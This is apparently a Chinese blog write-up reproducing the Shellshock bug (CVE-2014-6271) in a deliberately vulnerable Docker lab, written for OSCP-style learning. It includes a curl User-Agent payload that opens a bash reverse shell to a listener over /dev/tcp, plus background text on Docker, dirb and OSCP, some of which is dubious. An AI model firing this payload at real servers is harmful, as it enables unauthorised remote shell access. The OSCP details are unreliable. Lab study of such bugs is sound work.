CVE-2014-6271漏洞复现

0x00 前言

要是平时我肯定不会想打去复现这个漏洞的,但是由于需要学习shellshock漏洞的利用,所以这里可以进行一下复现

0x01 正文

这里直接使用别人弄好的docker,简单又方便

docker pull hmlio/vaas-cve-2014-6271

下载完成之后,开启docker

docker run -d -p 80:80 hmlio/vaas-cve-2014-6271

访问目标页面
在这里插入图片描述
这里还需要知道一个路径,直接dirb
在这里插入图片描述
这里接着对cgi-bin进行一个爆破
在这里插入图片描述
最后拿到目标
执行payload:
curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.25.165/2333 0<&1 2>&1” http://192.168.25.178/cgi-bin/stats

这里不使用msf因为oscp 规定msf只能使用一次来着(我隐约记得)

kali监听就行
在这里插入图片描述

补充知识

docker

Docker是一个开源的应用程序容器引擎,它可以将应用程序打包成一个容器,然后轻松地在任何地方部署,不受运行环境的限制,同时也保证了应用程序在不同平台之间的一致性。Docker允许开发人员在容器中封装应用程序和依赖库,从而消除了环境差异所带来的问题,并提供了一种快速、可靠且一致的方法来构建、部署和运行应用程序。Docker也有一些基于容器的服务,如Docker Compose、Docker Swarm和Kubernetes,可以帮助开发人员和运维人员更好地管理和部署容器。

shellshock

ShellShock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。

ShellShock漏洞的原理是,因为Bash在解析环境变量时存在漏洞,攻击者可以通过设置环境变量来执行任意代码。具体来说,Bash在解析环境变量时会将变量中的内容作为命令来执行,如果变量中的内容包含了恶意的命令,就会导致攻击者可以执行任意代码。

为了防范ShellShock漏洞,建议用户及时更新Bash版本,并避免在非必要情况下使用Bash来执行命令。同时,管理员也应该对服务器进行安全配置,限制对Bash的访问权限,避免攻击者利用ShellShock漏洞进行攻击。

shellshock危害

ShellShock漏洞的危害包括:

攻击者可以通过该漏洞执行任意代码,获取服务器控制权,甚至进行拒绝服务攻击。
ShellShock漏洞容易受到攻击,攻击者可以利用该漏洞获取私人信息,如密码文件等。
ShellShock漏洞的存在使得攻击者可以轻松地通过注入代码来攻击服务器,从而对互联网结构造成威胁。

因此,ShellShock漏洞的危害性非常大,需要用户及时更新Bash版本,并采取相应的安全措施来防范攻击。

kali

Kali Linux是一款由Offensive Security团队开发的基于Debian Linux的操作系统,旨在提供给安全专业人员进行渗透测试、安全审计和漏洞评估等常见任务所需的工具和环境。Kali Linux集成了众多的安全测试工具,包括Nmap、Metasploit等常用的渗透测试工具,以及Wireshark、Aircrack-ng等网络安全工具。其特点是易于使用、自由和开放源代码,因此广泛应用于安全行业,成为了当下领先的安全测试操作系统。

dirb

Dirb是一个基于字典的Web目录扫描工具,它可以探测Web服务器上隐藏的文件和目录。它通过使用常见的字典列表来查找网站的目录和文件,并执行类似的任务,如对目录的控制、暴力攻击等。Dirb可以用于探测网站上的隐藏文件和目录,并在这些目录中搜索敏感文件。它也可以用于检查Web服务器对目录的权限的限制情况。此外,它还提供了自定义字典的功能,可以使用用户自定义的字典列表进行扫描,以找到更多的目录和文件。

其他目录扫描工具

除了DirBuster,还有许多其他的目录扫描工具可供选择。以下是一些类似DirBuster的目录扫描工具:

Dirsearch:一个用Python编写的暴力扫描工具,用于查找隐藏的Web目录和文件。它可以在Web服务器上扫描指定目录,并尝试通过字典攻击来获取敏感文件。
Webdirscan:一个简单的多线程Web目录扫描工具,使用Python语言编写,主要调用了requests第三方库实现。它能够快速扫描Web服务器上的目录结构,并尝试获取敏感文件。
Gobuster:一个开源工具,主要用于网站目录扫描和子域名收集。它可以通过字典攻击或暴力破解方式来扫描目标网站的目录结构,并尝试获取敏感文件或子域名。

这些工具都可以帮助攻击者或安全研究人员扫描Web服务器的目录结构,并尝试获取敏感文件或信息。然而,请确保在使用这些工具时遵守法律法规和道德准则,仅在授权范围内进行操作。

OSCP

OSCP(Offensive Security Certified Professional)是一种计算机安全认证,由Offensive Security公司创建并维护。该认证涵盖了网络渗透测试和信息安全技术的广泛知识,并旨在测试个人的技能和能力,以便在实际情况下进行网络渗透测试。

通过OSCP认证,个人可以证明他们已经具备了以下技能和能力:

  • 渗透测试知识和技术
  • 端口扫描和服务识别
  • 漏洞扫描和利用
  • 密码破解和渗透测试后的维护
  • 物理和社会工程学攻击

认证考试需要参加一个24小时的渗透测试实验,个人需要在规定时间内寻找到网络中的5个目标及其相关信息。考试难度很高,因此前置连续成功完成两次主题为“渗透测试与无线渗透测试”的Offensive Security课程是强烈建议的。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王嘟嘟_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值